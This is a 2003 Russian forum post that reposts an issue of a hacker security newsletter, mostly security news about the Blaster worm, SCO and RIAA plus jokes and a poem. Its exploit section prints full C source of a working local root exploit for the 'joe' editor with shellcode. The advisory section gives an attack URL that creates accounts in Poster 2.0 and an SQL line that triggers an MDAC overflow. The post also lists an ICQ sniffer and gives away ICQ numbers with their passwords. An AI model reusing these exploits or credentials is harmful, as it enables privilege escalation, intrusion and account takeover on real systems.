форум волчат  

Безопасность сетей и многое другое -- сисадминам будет интересно (может быть)... - форум программистов и не только - компьютерные программы - бесплатно
 РегистрацияРегистрация   ВходВход 
Сделать стартовой Добавить в избранное Николай Попков Правила форума
Вход в чаты: чат волчат и чат знакомств (если нет регистрации в чатах, то пароль не нужен):
Ник в чате: Пароль:
Ник в чате: Пароль:

Cайт знакомств Holiday.Ru - 12360781 анкет:

Я ищу от до лет, из города

Реальные бесплатные знакомства в твоем городе:

Я ищу от до лет, в регионе

Рекламное агентство Реклама SU - контекстная реклама и продвижение сайтов с оплатой за результат
Форум Раскрутка сайта и форум Маркетинг и реклама. Чаты. Shot.Su - игровой сервер CSS и CS
Сонник. Анекдоты. Приметы. Aфоризмы. Тосты.

Баннерная сеть ClickHere
Безопасность сетей и многое другое -- сисадминам будет интересно (может быть)...

 
   Список форумов волчат -> форум программистов и не только - компьютерные программы
Форум Раскрутка сайтов  
Автор Сообщение
STVENОффлайн
Зарегистрирован: 08.07.2003
Всего сообщений: 1824
Откуда: Минск, Беларусь
Пол: ни то ни сё
22 Сен 2003 Пн 07:33   Безопасность сетей и многое другое -- сисадминам будет интересно (может быть)...

Рассылка RusH security team Выпуск: #32 [ 30-08-2003 ]

|=---=[ INTRO ]=-----------------------------------------------------------------

Вот и подоспела наша новая рассылка =) Что нового? Ну во-первых теперь рассылка будет выходить в формате html так как проведенное на сайте голосование показывает что этот формат более востребователен нашими читателями. Во-вторых новый раздел MAIL в котором будут публиковаться наши ответы на ваши письма. В-третьих в этом выпуске снова появился раздел FREE-UINS в котором мы выложили два халявных 6-знака и два не менее халявных 7-знака. Ну чтож... вперед. Приятного чтения. =))).

|=---=[ Новости security мира ]=-------------------------------------------------------------------- -------=|
|=-------------------------------------------------------- ----------------------------------------------------=|
# Новый номер журнала "Системный Администратор"
В номере:
- Восстановление данных с лазерных дисков
Полезная информация: как восстановить удаленные файлы с CD-R/CD-RW и как восстановить информацию с очищенных CD-RW.
- Мониторинг Windows-серверов с помощью Nagios Часть 2
Андрей Бешков подробно рассказывает еще об одном способе настройки Nagios для мониторинга серверов под управлением семейства операционных семейств Windows. Данный способ основан на использовании протокола SNMP.
- Пингвин с одного пинка
Описание инструмента, который позволит администратору, сэкономив время и автоматизировав процесс, установить необходимое количество идентичных Linux на основании заранее определенной конфигурации (для дистрибутивов RedHat, начиная с версии 5.0).
- NETFILTER
Общие сведения и пример использования NETFILTER - нового механизма фильтрации сетевых пакетов, появившегося в составе ядра Linux версии 2.4 и позволяющего воздействовать на процесс прохождения пакетов по стеку IPv4-протокола, перехватывать их, блокировать, изменять их содержание. Это окажется полезным, если вы решите разработать собственный модуль фильтрации сетевого трафика, учета статистики трафика, шифрования IP-пакетов и т. д.
- Переполнение буфера в Windows NT/2000/XP
Рассмотрена одна из самых распространенных атак на переполнение буфера, так называемая атака на 'срыв стэка' и возможности ее предотвращения.
- Новые средства ОС FreeBSD 5
Подробное описание новых средств, появившихся и получивших более качественную поддержку в 5 ветке FreeBSD.
- OpenBSD. Первые шаги
Продолжение знакомства с операционной системой OpenBSD. Настройка системы после ее установки.
- NetBSD: установка и настройка
Экскурсия в мир еще одной BSD-системы.
- Эффективная почтовая система на базе Exim
Статья рассматривает создание почтовой системы с использованием Exim MTA версии 4, Exiscan, SpamAssassin, Dr.Web; системы, защищенной от спама и вирусов, рассчитанную на большое количество пользователей (сотни пользователей), а также имеющую удобную конфигурацию в одном файле. В нашем примере в качестве ОС выбрана FreeBSD 4, но не будет никакой разницы в установке для любой другой ОС семейства UNIX.
- Плохое электропитание, или Грабли с UPS
Подключение источника бесперебойного питания UPS Powercom KIN 625AP
- Могущество кодов Рида-Соломона, или Информация, воскресшая из пепла
Описаны основные идеи, лежащие в основе построения помехозащитных кодов.
- Протокол V.90
Особенности работы протокола V.90 в некоторых модемах.
- Регулярные выражения и поиск текста в Perl
Ссылка: http://www.samag.ru/sod/0803/
___________________________________________________________________ ________________________________

# ФБР: опасный вирус написал подросток
На сегодня же назначена пресс-конференция, в ходе которой американские силовые ведомства обещают поделиться подробностями расследования. Сейчас известно лишь, что на след подростка власти вывел человек, утверждающий, что он видел, как подозреваемый тестировал вирус, после чего свидетель позвонил в ФБР. Заявление звучит несколько странно, однако от более подробных комментариев американские власти пока отказываются.
Blaster использует 'дыру' в операционных системах Windows NT/2000/XP и Windows 2003 Server, о которой стало известно в июле. Первые сообщения об обнаружении червя Blaster появились 11 августа примерно в 23 часа по московскому времени. Blaster (так его назвали специалисты Symantec), известный также под кодовыми именами Lovsan (McAfee), Poza (CA) и MSBLAST (Trend), начал распространяться по Сети с угрожающей скоростью. Ситуация осложнилась после того, как сразу за первой версией червя в интернете начала распространяться вторая. Примечательно также, что через несколько дней после начала эпидемии 'Лаборатория Касперского' обнаружила нового сетевого червя Welchia, который ищет компьютеры, зараженные вирусом Lovesan, лечит их и устанавливает заплатку для Windows.
Хотя своей конечной цели - DDoS-атаки на сайт WindowsUpdate.com, содержащий обновления операционной системы Windows, - вирус не достиг, ущерб от него оказался очень значительным. Из-за распространения червя интернет-трафик резко вырос, что привело к переполнению каналов передачи данных в Сети. Больше всего пострадали домашние компьютеры из-за того, что их владельцы проигнорировали угрозу, не установили патч и не обновили антивирусы. По данным антивирусной компании Symantec, вирус заразил более 500 тыс. компьютеров по всему миру. Эксперты считают этот червь одним из самых вредоносных за последнее время.
___________________________________________________________________ ________________________________

# Вирус Blaster поражает некоторые Cisco системы
Как и в случае с червем Code Red, продукты Cisco Systems, которые поставляются с технологиями Microsoft, нуждаются в защите от Blaster. Однако в случае со сравнительно новым программным обеспечением от Microsoft, уязвимые продукты будут менее подвергнуты проблемам из-за различий в способах распространения этих двух червей. С Code Red была определенная вероятность отказа оборудования, в данном же случае проще защитить продукт фаерволом и этим минимизировать риск.
В соответствии с заявлением Cisco, определенное количество сетевых программных продуктов с использованием технологий Microsoft нуждаются в установке обновлений для защиты от Blaster. В их число входят: Cisco CallManager, Cisco Building Broadband Service Manager (только версии 5.1, 5.2 и HotSpot 1.0), Cisco Customer Response Application Server, Cisco Personal Assistant, Cisco Conference Connection, Cisco Emergency Responder.
Сетевой гигант предоставляет соответствующее бесплатное программное обеспечение для обновления этих программ.
Между тем, обновления, выпущенные Microsoft, должны быть установлены также на отдельные классы программных продуктов Cisco. Они включают: Cisco Unity, Cisco uOne Enterprise Edition, Cisco Network Registrar, Cisco Internet Service Node, Cisco Intelligent Contact Manager (ICM) (Hosted и Enterprise), Cisco IP Contact Center (IPCC) (Express и Enterprise), Cisco E-mail Manager, Cisco Collaboration Server, Cisco Dynamic Content Adapter, Cisco Media Blender and TrailHead (часть продукта Cisco's Web Gateway). Кроме этого, Cisco Transport Manager, Cisco Broadband Troubleshooter, DOCSIS CPE Configurator и Cisco Secure Applications также должны быть обновлены при помощи патча от Microsoft.
___________________________________________________________________ ________________________________

# Раcкрытие нажатых клавиш в Unix/Linux системах
Недостаток обнаружен в пуле энтропии, осуществленном в /dev/random устройстве на множестве UNIX системах. Атакующий способен раскрыть нажатие клавиш пользователя (например, при вводе пароля).
Обнаружено, что низкопривилегированный пользователь может раскрыть нажатия клавиш на консоли, которые являются источником для отбора пула энтропии. Это возможно из-за использования предсказуемых последовательностей синхронизации. Освобождая /dev/random, и затем рассчитывая время, когда данные становятся доступными, атакующий может точно определить, какие события происходят в этих интервалах. Подробности смотрите тут: http://www.securitylab.ru/?ID=39767
Уязвимость обнаружена в FreeBSD 2.2-5.1, Linux kernel 2.0-2.4.20, NetBSD 1.0-1.6.1, OpenBSD 2.0-3.3
___________________________________________________________________ ________________________________

# "Добрый" вирус штопает дыры в Windows
Сети появилась забавная модификация червя LoveSan, так же известного как Blaster. На сей раз атора вируса сразу можно причислить к лику святых, поскольку им руководили исключительно благие намерения. Новый вируc распространяется в Интернете через ту же самую брешь, что и LoveSan. Он не только не вредит компьютерам пользователей, но еще и штопает ту самую дыру в Windows, благодаря которой стало возможно его появление, сообщает Reuters и newwws.ru.
Имена нового вируса "Welchia" или "Nachi", он проверяет наличие дыры в операвционке и наличие на компьютере LoveSun, после чего пытается удалить вредоносного предшественника и навести порядок на компьютере. В частности, пользователям английских, китайских и корейских версий Windows "Welchia" сам скачивает заплатку с сайта Microsoft. Затем он пытается передать себя дальше по Сети. Однако, не смотря на благость намерений, компьютерные специалисты считают вмрус вредоносным по одной только той причине, что он производит свои действия без ведома пользователей. Кроме того, вирус "Welchia" увеличивает нагрузку на компьютерные сети.
Наиболее широкое распрстранение "Welchia" отмечено в Азии, особенно в Японии. Вирус запрограммирован на самоуничтожение в 2004 году. По свидетельству специалистов компании Symantec Corp., "старый" червь MSBlaster LoveSan только за прошлую неделю заразил порядка 570000 компьютеров, работающих под управлением Windows XP, 2000, NT и Server 2003. По оценками компании TruSecure Corp., провевшей обследование более 1000 корпоративных сетей, 20 процентов из них "подхватили" злополучную заразу.
___________________________________________________________________ ________________________________

# Я бы в хакеры пошел, пусть меня научат...
Владельцы частных компаний сейчас озабочены нехваткой специалистов в области информационных технологий. Однако проведенное исследование показывает, что для подрастающего поколения работа с компьютерами является куда более привлекательной карьерой, чем стать премьер-министром или даже звездой эстрады.
Согласно исследованию 22% детей в возрасте 12-15 лет считают работу с компьютерами более предпочтительной карьерой, чем карьера звезды эстрады (15%) или карьера врача (13%).
Перспектива стать ИТ специалистом оказалась более привлекательной, чем должность премьер-министра, банковского менеджера, солдата или учителя.
Главной причиной таких суждений являются деньги, так как 34% опрошенных сказали, что эта профессия им нужна из-за высокой зарплаты.
Другие 33% сказали, что хотят работать в сфере ИТ потому, что это "классная технология", но лишь один из пяти считал, что работа будет самым веселым времяпрепровождением, сообщает 3dnews.ru.
___________________________________________________________________ ________________________________

# SCO показала не тот код
Компания SCO Group и движение открытых исходников продолжают все более ожесточенные споры друг с другом. Новый их виток начался после демонстрации на конференции SCO Forum в Лас-Вегасе слайдов с примерами похищенного, по мнению SCO, кода. Один из главных идеологов движения свободного ПО Брюс Перенс уже установил происхождение этого кода. Как оказалось, он заимствован из очень старых версий Unix и явно не подпадает под копирайты SCO. С такими доказательствами, по мнению Перенса, у SCO нет ни единого шанса на победу.
Представители SCO поспешили оправдаться. Исполнительный вице-президент SCO Крис Зонтаг сказал, что фрагменты кода, показанные на SCO Forum, были выбраны из-за их простоты и понятности, а не из-за того, что SCO намерена использовать их в качестве доказательства в суде. Правда, если код хотели сделать понятным, то неясно, зачем было менять латинские буквы на греческие. Код, который SCO покажет в суде, был заимствован именно из Unix System V - версии Unix, на которую у SCO имеется копирайт. В свое время глава компании Дарл Макбрайд уже говорил, что в Linux найдено более миллиона строк кода Unix.
Мнение по этому вопросу движения open source давно известно. В очередном своем обращении к SCO еще один идеолог движения свободного ПО Эрик Рэймонд еще раз призвал компанию продемонстрировать незаконно перенесенный в Linux код. Он согласен, что перенос в Linux кода, защищенного копирайтом незаконен, более того, такая практика противоречит правилам разработки свободного ПО. если SCO покажет заимствованный код, то разработчики Linux немедленно займутся его заменой, и конфликт будет исчерпан наиболее мирным и удобным способом.
Об этом же сказал, выступая на SCO Forum, другой представитель движения open source Джефф Герхардт (Jeff Gerhardt). "Мы в сообществе открытых исходников уважаем права интеллектуальной собственности и гордимся своим умением решать проблемы своим собственным кодом. Если в ядре Linux есть незаконно попавший туда код, сообществу не нужно ни строки из него, и мы уберём его... Предлагаем SCO указать в точности, какой код, по её мнению, попал в Linux незаконно, с указанием конкретных файлов, строк и объяснениями, в чем незаконность. Только получив полную информацию, мы можем начать исправлять возможно существующие бреши. Если SCO в самом деле беспокоит защита своей собственности, а не раздувание с помощью обвинений своих биржевых котировок и не мзда от Microsoft за вредительство, тогда она будет рада возможности избавиться от проблем так быстро и безболезненно, как только возможно, - заявил Герхардт. Сообщество открытых исходников не станет, тем не не менее, тихо сидеть, пока SCO объявляет весь Linux своей собственностью и готовится собирать лицензионный сбор. Это неприемлемая попытка похитить работу тысяч программистов, работавших добровольно, и с ней нужно покончить".
Но SCO по-прежнему отказывается открыть якобы заимствованный код. По словам представителей компании, заимствований так много, что избавиться от них у создателей Linux просто не выйдет. Лучше всего эти утверждения прокомментировал сам Линус Торвальдс в интервью eWeek. "Они накурились!" - сказал он. Торвальдс лично знает людей, писавших те части ядра Linux, на которые ссылается SCO. Он уверен, что заимствований размером в сотни тысяч строк не существует. "В чём SCO разбирается лучше всего - это в лицемерии," - добавил Торвальдс.
Кстати, фрагменты кода из древнейших версий Unix, которые показывала на своих слайдах SCO, в ядре Linux версии 2.6 уже отсутствуют. "Забавно, но те строки уже удалёны из ядра Linux версии 2.6, - рассказывает Торвальдс. - И дело не в проблемах с копирайтом, а в жалобах разработчиков на "уродливость" кода", сообщает compulenta.ru
______________________________________________________________ _____________________________________

# ФБР ищет помощи общественности в борьбе с вирусописателями
Сегодня представители Федерального бюро расследований США обратились к интернет-общественности с просьбой оказать им поддержку в борьбе с вирусными эпидемиями и поиске создателей вредоносного кода.
Директор ФБР Роберт Мюллер (Robert S. Mueller III) заявил: "Мы используем новейшие технологии, анализ кода должен нас вывести на источники распространения эпидемий, я уверен, что мы найдем виновных. Просьба ко всем осведомленным пользователям обратиться в ближайший к ним офис ФБР".
___________________________________________________________________ ________________________________

# RIAA приоткрыла тайны охоты за пиратами
На проходящем в Нью-Йорке судебном процессе над пользовательницей пиринговой сети под псевдонимом Nycfashiongirl Ассоциация индустрии звукозаписи США (RIAA) предоставила данные о способах выслеживания музыкальных пиратов. Специалисты RIAA могут сделать вывод о незаконном происхождении MP3-файла на основе анализа "цифровых отпечатков" - случайных данных, добавляемых в файл при кодировании, а также на основе тэгов метаданных. Nycfashiongirl, не желающая огласить свое реальное имя, обвиняется в незаконном распространении около 1000 музыкальных произведений в интернете.
"Цифровые отпечатки" могут показать специалистам, был ли файл создан с лицензионного CD или был скачан из интернета с помощью файлообменной системы Napster. Подобную методику использует ФБР при расследовании фактов взлома сайтов. В случае с Nycfashiongirl оказалось, что все предлагаемые ею песни были скачаны из Napster. По настоянию RIAA американские интернет-провайдеры должны предоставить данные о 1300 пользователях, участвующих в пиринговых сетях. Ассоциация намерена подать сотни исков с намерением получить финансовую компенсацию в каждом отдельном случае от $750 до $150 тыс. за каждую песню, незаконно находящуюся в компьютере пользователя.
___________________________________________________________________ ________________________________

# Symantec вводит систему активации
Компания Symantec добавила в свою последнюю версию антивирусной программы новую функцию, направленную против пиратов. Norton Antivirus 2004, который выйдет в следующем месяце и был анонсирован Symantec в прошедший понедельник, будет использовать активацию продукта - так называемую методику привязки копии программы с конкретным компьютером. Symantec также планирует ввести систему активации во всех своих продуктах в течение 2004 года.
Дэл Смит (Del Smith), старший менеджер Symantec, заявил, что активация предназначена, чтобы защитить потребителей от широко распространенных пиратских подделок программ Symantec. Компания подсчитала, что около 3,6 миллиона поддельных копий программ Symantec продается ежегодно. Это доставляет немалую головную боль как Symantec, так и пользователям. Потребители слишком поздно узнают, что программа не выполняет должных функций.
Впервые задействовала активацию в своих программных продуктах Microsoft при выпуске Windows XP. Adobe и Macromedia также экспериментировали с активацией в последних выпусках их программ.
По словам Смита, система активации Symantec генерирует уникальный код из букв и цифр, чтобы идентифицировать конфигурацию компьютера; и связывает этот код с ключом конкретной копии программы. Это сохраняет информацию о лицензии на жестком диске компьютера и позволяет производить до пяти активаций для одного ключа.
'Пять активаций нужны для тех пользователей, которые часто обновляют свой компьютер', - комментирует Смит.
Аналитик исследовательской компании IDC Ал Джиллен (Al Gillen) заявил изданию ZDNet, что использование активации Symantec, вероятно, не вызовет больших трений компании с пользователями по причине особенностей работы антивирусного ПО. 'В случае использования антивирусного ПО, вы часто обращаетесь к разработчику для скачивания обновлений, что подразумевает продолжительные отношения с производителем, - говорит Джиллен. - Если вы допускаете, что ваш компьютер будет часто 'общаться' с компьютером компании, процесс активации - лишь часть этого'.
Смит заявил, что более 250 тысяч клиентов выполнили процесс активации испытательных версий Symantec. Это вызвало лишь незначительные жалобы со стороны клиентов.
___________________________________________________________________ ________________________________

# Служба Osirusoft закрылась после шквала DDoS атак
Серверы Osirusoft, одного из крупнейших 'черных списков' антиспама, были отключены оператором после шквала DDoS атак, который обрушился на эту службу.
Почтовые серверы, которые все еще используют черный список Osirusoft, не смогут получать почту до тех пор, пока их не переконфигурируют на другой черный список. Оператор службы пока не сделал никакого официального заявления, но поговаривают, что когда DdoS-атаки прекратятся, служба вернется к работе в какой-либо иной форме.
___________________________________________________________________ ________________________________


# Маршрутизаторы Netgear атакуют ни в чем не повинные сервера
Компания Netgear с прискорбием сообщила, что некоторые образцы ее оборудования могут самопроизвольно инициировать DoS-атаки.
Проблема, как сообщает newwws.ru со ссылкой на ZDNet, возникла вследствие некорректной реализации Network Time Protocol протокола, используемого сетевыми устройствами для связи с серверами точного времени, необходимого для синхронизации их встроенных часов. Ошибка заключается в том, что если time-сервер по какой-либо причине не в состоянии вовремя ответить на поданный запрос, роутер продолжает яростно бомбардировать его вопросами 'который час?' и 'как пройти в библиотеку?' до тех пор, пока time-сервер не умрет окончательно, согнувшись под бременем непосильной нагрузки.
Не так давно, NTP-сервер Висконсинского университета уже стал жертвой такой непреднамеренной атаки: задумавшись на несколько секунд, он мгновенно получил шквал аплодисментов от бюджетных роутеров Netgear с частотой до 250 тысяч запросов в секунду или же - на несколько сот мегабит в эквиваленте за тот же период времени.
Судя по имеющимся данным, полученным в ходе совместного расследования, ошибке подвержены только роутеры моделей RP614, RP614v2, DG814, MR814 и HR314. Над устранением проблемы ведется активная работа, однако специалисты полагают, что ошибка настолько фундаментальна, что на ее устранение уйдут еще многие годы.
___________________________________________________________________ ________________________________

# Китайских спамеров ждет расстрел через повешенье
Китай вскоре перестанет быть пристанищем для спамеров и всевозможных сетевых мошенников.
Китайская Ассоциация Интернета (CIA) заявила о создании специальной группы, которая будет оперативно разбираться с теми, кто злоупотребляет электронной почтой и доверием пользователей Интернета. Ассоциация полагает, что спамеры являют собой угрозу политической и общественной стабильности, что "незаконные элементы" используют спам для распространения разнообразной лживой рекламы или стимуляции распродаж, которые недвусмысленно запрещены китайскими законами, сообщает newwww.ru со ссылкой на The Register.
Различные антиспамерские организации уже давно жалуются на поток спама идущий через китайские сервера, многие из которых плохо сконфигурированы, а потому позволяют отправлять почту любому желающему. А некоторые китайские провайдеры даже 'делают деньги' рекламируя сайты посредством спамерских рассылок.
Многие провайдеры во всем мире настолько утомлены спамом китайского происхождения, что попросту блокируют все китайские IP разом, а в результате страдают не только спамеры, но и ни в чем неповинные пользователи, предприниматели и даже правительственные структуры Китая.
В прошлом году в Китае были приняты достаточно жесткие антиспамерские законы, но вот, как водится, исполнять их на практике до сегодняшнего для их было некому. Теперь есть надежда, что спам в Китае будет уничтожен как явление и сетевым администраторам других стран больше не придется блокировать адреса Поднебесной, в которой проживает четверть населения земного шара.
Конечно, расстреливать спамеров пока никто не собирается даже в Китае, где законы не отличаются особой мягкостью. Но оказаться на месте того, кого поймает Китайская Ассоциация Интернета, мы не пожелали бы даже недругу, потому что, как водится, первые процессы будут носить показательный характер и на снисхождение преступникам рассчитывать не придется. Особенно в свете формулировок про "угрозу политической и общественной стабильности" от них исходящей.

|=---=[ BUGTRAQ ]=------------------------------------------------------------
# Неавторизованный доступ к административным функциям в Poster 2.0
Уязвимость обнаружена в Poster. Удаленный пользователь может получить доступ к административным функциям. Удаленный пользователь может получить доступ к установочному сценарию, чтобы добавить учетную запись пользователя.
Пример:
http://[target]/poster/?go=setup_submit&un=login&pw=pass&em=EMAIL&submit=submit
Уязвимость обнаружена в Poster 2.0
___________________________________________________________________ ________________________________

# Удаленное переполнение буфера через MDAC в MS SQL сервере
Unicode переполнение буфера обнаружено в MDAC, которая используется Server QL-DMO библиотекой. Удаленный атакующий может выполнить произвольный код на целевой системе. Уязвимость можно эксплуатировать через широковещательные запросы.
Одна из особенностей сетевой библиотеки SQL сервера - возможность запрашивать список SQL серверов в локальной сети. Для этого посылается широковещательное UDP сообщение к 1434 порту, которое достигнет всех приложений в локальной сети. Эта функция - компонент SQL-DMO, который используется SQL Server Service Manager (всякий раз при запуске), Enterprise Manager (при регистрации сервера), Query Analyzer и SQL (при клике на "..." клавишу), DTS (при выборе SQL сервера) и т.п.
Все SQL серверы, получающие широковещательный запрос, отвечают стандартным UDP пакетом. Если злонамеренная машина отвечает на этот широковещательный запрос слишком длинным пакетом, произойдет переполнение буфера. Переполнение происходит в UNICODE строке, так что для эксплуатации этого переполнения буфера должен использоваться Venetian метод.
Любые утилиты SQL сервера, которые используют SQL-DMO функцию для поиска SQL серверов, уязвимы к этому нападению. Нападающий может использовать несколько методов для эксплуатации этой уязвимости:
Установить службу, слушающую на 1434 UDP порту, которая будет посылать эксплоит при получении данных. В этом случае злонамеренный сервис должен находится в той же самой подсети.
Засыпать удаленную подсеть UDP пакетами, надеясь, что кто-то сделает уязвимый запрос. Например, посылайте злонамеренные пакеты каждые 2 сек к 192.168.3.255, которые достигнут всех машин на 192.168.3.x подсети. Когда кто-то наконец пошлет широковещательный UDP пакет, то они примут злонамеренный пакет и подвергнуться действию эксплоита.
Также возможно через низко привилегированную учетную запись в MS SQL сервере послать запрос напрямую к IP адресу на сети. Следующая SQL инструкция заставит SQL сервер запросить хост с именем SERVER с UDP пакетом:
SELECT * FROM openrowset( 'SQLOLEDB', 'server=SERVER\instance name;uid=sa;pwd=', '')
Могут быть и другие методы заставить SQL сервер посылать UDP запрос и вызвать переполнение.
Уязвимость обнаружена в Microsoft Data Access Components 2.5sp1 - 2.7 SP1

|=---=[ EXPLOIT ]=---------------------------------------------------------------
# Linux x86 "joe" local exploit

/*
Linux x86 "joe" local exploit
author: dodo <dodo@darkwired.org>
author: tsunami <tsunami@darkwired.org>
tested on: Slackware Linux (2.4.20), `joe` 'version 2.9.7'
date: 30-07-2003 updated: 01-08-03

notes:
could be used for backdooring purposes..
greets to everyone @ #darkwired

root@comprak:/dodo/edu/joe# chmod a+s /usr/bin/joe
dodo@comprak:/dodo/edu/joe$ ./dw-bof-joe -2000
sh-2.05b# id
uid=0(root) gid=10(wheel) groups=10(wheel)

usage:
./dw-bof-joe [offset]
Slackware Linux offset: -2000

contact:
http://www.darkwired.org/
ssl-irc: irc.darkwired.org #darkwired
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BSIZE 1016


static char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x17\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\ x0b"
"\x89\xf3\x8d\x4e\x08\x31\xd2\xcd"
"\x80\xe8\xe4\xff\xff\xff\ x2f\x62"
"\x69\x6e\x2f\x73\x68\x58";


unsigned long get_sp(void)
{
__asm__("movl %esp, %eax");
}

int main(int argc, char *argv[])
{
char buffer[BSIZE+32];
unsigned long sp = get_sp(), i;
signed long offset = -2000;

if(argc>1) offset = atoi(argv[1]);
sp = sp - offset;

memset(buffer, 0x90, sizeof(buffer)); //glijbaan
memcpy(buffer+(BSIZE-strlen(shellcode)), (char *)&shellcode,
strlen(shellcode));
//memcpy(buffer+BSIZE+12, &sp, sizeof(sp));
for(i=BSIZE;i<BSIZE+32;i+=4)
{
*(long *)&buffer[i] = sp;
}
memset(buffer+BSIZE+32, 0x0, 1);


if(setenv("HOME", buffer, 1)==-1) return -1;
system("joe");
return 1;

|=---=[ SOFT ]=-----------------------------------------------------------------
# ICQ Snif 1.2.18
Сниффер сообщений ICQ, IRC и email-писем в локальной сети, работающий в реальном времени. Включает ARP-спуфер, позволяющий перехватывать трафик за пределами сетевых коммутаторов.
Платформы: Windows ALL
Сайт: http://www.ufasoft.com/
____________________________________________ _______________________________________________________

# Linux Security Auditing Tool v0.8.1
Linux Security Auditing Tool (LSAT) - инструмент ревизии защиты LINUX/UNIX. Программа проверяет конфигурацию системы и сетевые настройки на наличие типичных ошибок безопасности/конфигурации и ненужных пакетов.
Сайт: http://usat.sourceforge.net/
________________________________________________________________ ___________________________________

# mail2sh v1.2
Mail2sh позволяет выполнять команды оболочки по электронной почте. Команды выполнены с привилегиями пользователя, и объединены с PGP модулем, что гарантирует некоторый уровень защиты для использования.
Скачать: http://www.securitylab.ru/tools/_services/download/?ID=30926
_____________________________________________________ ______________________________________________

# Motherboard Monitor 5.3.4.0
Новая версия одной из лучших программ мониторинга системы
Скачать: http://radified.com/Files/MBM_534.EXE
______________________________ _____________________________________________________________________

# RAM Defrag v2.55
Утилита для дефрагментации и освобождения оперативной памяти
Скачать: http://www.catbytes.de/ram_defrag_english.exe
__________________________________________________________ _________________________________________

# The Bat! v2.0 Beta 5
Новая версия популярного почтового клиента
Скачать: http://www.ritlabs.com/download/the_bat/beta/tb200b05.rar

|=---=[ MUSIC ]=----------------------------------------------------------------

# Darude - "Rush"
Альбом полностью можно скачать здесь: http://www2.fa.is/~n07108525/Darude-Rush.zip
................................................................... ....................

З.Ы. Посылайте свои вопросы на idtwolf@pisem.net и тогда возможно в следующей рассылке в этом разделе вы получите ответ.
............................................................. .............................

|=---=[ FREE UINS ]=------------------------------------------------------------

# Убедительная просьба больше одного не хапать!

ICQ: 689477 Password: rush
ICQ: 623091 Password: rush
ICQ: 7259474 Password: rush
ICQ: 1062036 Password: rush

|=---=[ LINKS ]=-----------------------------------------------------------------
# Заказные убийства
Вот кто-то вас сильно достал... чего делать будете? Можно неплохо отвести душу и "заказать" нахала... а потом еще и станцевать на его могилке на виртуальном кладбище... Место, орудие убийства и киллера вы выбираете по своему желанию... а ваша жертва получит по почте некролог и статью из газеты. А так же указания по поиску собственной могилы... Мдяяя.... смешно, если бы не было так грустно... Решились? Тогда вам сюда:
Ссылка: http://killers.ru/index.php

|=---=[ ЮМОР ]=----------------------------------------------------------------
# Готовый диалог между програмистом и его женой вечером, после работы.
Муж пришел домой: Good evening dear, I`m now logged in.
Жена: Ты купил хлеба?
Муж: Bad command or filename.
Жена: Hо я тебя попросила еще утром.
Муж: Erroneous syntax. Abort?
Жена: Как насчет нового телевизора?
Муж: Variable not found...
Жена: По крайней мере, дай мне свою кредитку, я хочу сходить в магазин.
Муж: Sharing Violation. Access denied...
Жена: Ты меня любишь или любишь только компьютеры или ты просто издеваешься
надо мной?
Муж: Too many parameters...
Жена: Зря я вышла за тебя замуж.
Муж: Data type mismatch.
Жена: Ты вообще бестолковый...
Муж: It`s by Default.
Жена: Как насчет твоей зарплаты?
Муж: File in use... Try after some time.
Жена: Какое у меня положение в нашей семье?
Муж: Unknown Virus
___________________________________________________________________ ________________________________

# Про хакера...
В сырой тюрьме, на западе Парижа,
Ещё опасен, но разоружён,
Сидит один московский хакер Миша,
За то, что крупный банк ограбил он.
Насильно стрижен, в полосатой робе,
С мишенью круглой сзади на спине,
Клопов считает в каменной утробе,
Программы пишет мелом на стене.
То вдруг погладит грязный коврик с пола,
То тихо плачет, если видит мышь,
Грозит убить козлов из Интерпола,
Лет через двадцать где-то, правда, Миш?
Пробрался в банк со спутника в Анголе,
Ушёл сетями африканских стран,
Сжёг все дискеты, где держал пароли
И нагло сбросил спутник в океан,
Уже на дно залёг, а не на нары,
Уже почти в тайге укрылся, но...
Они его поймали на Канарах,
Когда сорил деньгами в казино.
Его пытали зверски, как в гестапо,
И на глазах разбили Celeron,
А он всё вынес, съел четыре кляпа,
И предлагал буржуям миллион,
Его по морде били, как скотину,
А он, святой, возьми им да скажи:
"Но пасаран! Несите гильотину!"
Но принесли ему детектор лжи,
И лишь тогда поверили шпионы,
Промыв его бесценные мозги,
Что он украл семнадцать миллионов,
Чтоб заплатить провайдеру долги.
И вот он, бит, с распухшей головою,
Лежит в углу, свернувшись калачом,
Когда придут охранники с едою,
Ни ест, ни пьёт, ни просит ни о чём.
Молчит на все тюремные запросы,
Совсем завис - ни мёртвый, ни живой,
Но поднесут к нему дискету с DOS'ом,
И он на запах дёрнет головой,
Застонет: "Пива, пива дайте, гады!"
И поползёт к открывшейся двери,
За что жандармы бьют его прикладом:
"Мишель-то наш живой ещё, смотри!"
Уйдут они, бездумно повторяя
Наш русский мат, что слышится в тиши,
На всю тюрьму пространно рассуждая
О красоте загадочной души...
Но лишь шаги их стихнут в коридоре,
Он вдруг с земли подскочит, жив-здоров,
Бежит к двери, забыв про боль и хвори,
Забыв про все советы докторов,
Чуть подождав, покуда злость остынет,
К двери холодной ухом припадёт,
Тяжёлый камень в стенке отодвинет:
За ним давно прокопан тайный ход!
Откуда знать в Париже Интерполу,
Что без e-mail'а Мишке не впервой -
Ещё весной донёс почтовый голубь
В двоичном коде весточку домой,
Уже отвёртку сделал он из вилки,
Уже ломает друг тюремный сайт,
Уже нашёл он в маминой посылке
Буханку с Intel Pentium Inside.
И заключённых больше не тревожит
Глубокой ночью странный ровный стук:
Пускай не спал три месяца, но всё же
Собрал в неволе новый ноутбук.
И с замираньем сердца снова вышел
В такой родной до боли Интернет,
Где через час, обычным кликом мыши
Сумел скосить свой срок на десять лет,
Прислал письмо: "Встречайте, мама. Еду",
Дал выходной охране до зимы,
Пустил метро до камеры соседа
И продал дом начальника тюрьмы,
Сумел создать подпольную ячейку,
Послал сто грамм друзьям на Колыме,
Стал чемпионом Франции по Quake'у -
Забылся зэк, что он сидит в тюрьме,
Летает он, как свежий вольный ветер -
Доступно всё, о чём не мог мечтать,
н побывал повсюду на планете,
И никуда не хочет убегать .
Уж не грустит по Родине, по маме .
Вот только что-то изменилось в нём:
Он слишком странно смотрит вечерами
В экран с цветным решётчатым окном...

|=---=[ АРХИВ ]=-----------------------------------------------------------------
Архив рассылки: http://content.mail.ru/arch/arch_9711.html
и подписка на неё. Exclamation Exclamation Exclamation

|=---=[ ОБРАТНАЯ СВЯЗЬ ]=------------------------------------------------
По вопросам и предложениям пишите: idtwolf@pisem.net
